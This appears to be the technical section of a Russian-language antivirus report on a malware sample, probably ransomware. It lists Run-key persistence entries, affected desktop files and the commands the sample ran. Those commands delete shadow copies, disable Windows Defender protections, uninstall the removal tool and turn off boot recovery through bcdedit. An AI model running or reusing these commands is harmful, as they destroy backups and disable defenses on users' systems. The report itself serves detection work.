Техническая информация
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'type_nul' = '<Полный путь к файлу>'
- [HKLM\Software\Microsoft\Windows\CurrentVersion\Run] 'type_nul' = '<Полный путь к файлу>'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command "vssadmin.exe delete shadows /all /quiet; Set-MpPreference -EnableControlledFolderAccess Disabled; Set-MpPreference -DisableRealtimeMonitori...
- %HOMEPATH%\desktop\168.jpeg
- %HOMEPATH%\desktop\2.jpeg
- %HOMEPATH%\desktop\3.jpeg
- %HOMEPATH%\desktop\508softwareandos.doc
- %HOMEPATH%\desktop\about.htm
- %HOMEPATH%\desktop\about.html
- %HOMEPATH%\desktop\adadsi.html
- %HOMEPATH%\desktop\google chrome.lnk
- %HOMEPATH%\desktop\telegram.lnk
- '<SYSTEM32>\cmd.exe' /c "wusa /uninstall /kb:890830 /quiet /norestart & bcdedit /set {current} bootems off & bcdedit /set {current} advancedoptions off & bcdedit /set {current} optionsedit off & bcdedit /set {curre...
- '<SYSTEM32>\wusa.exe' /uninstall /kb:890830 /quiet /norestart
- '<SYSTEM32>\bcdedit.exe' /set {current} bootems off
- '<SYSTEM32>\bcdedit.exe' /set {current} advancedoptions off
- '<SYSTEM32>\bcdedit.exe' /set {current} optionsedit off
- '<SYSTEM32>\bcdedit.exe' /set {current} bootstatuspolicy IgnoreAllFailures
- '<SYSTEM32>\bcdedit.exe' /set {current} recoveryenabled off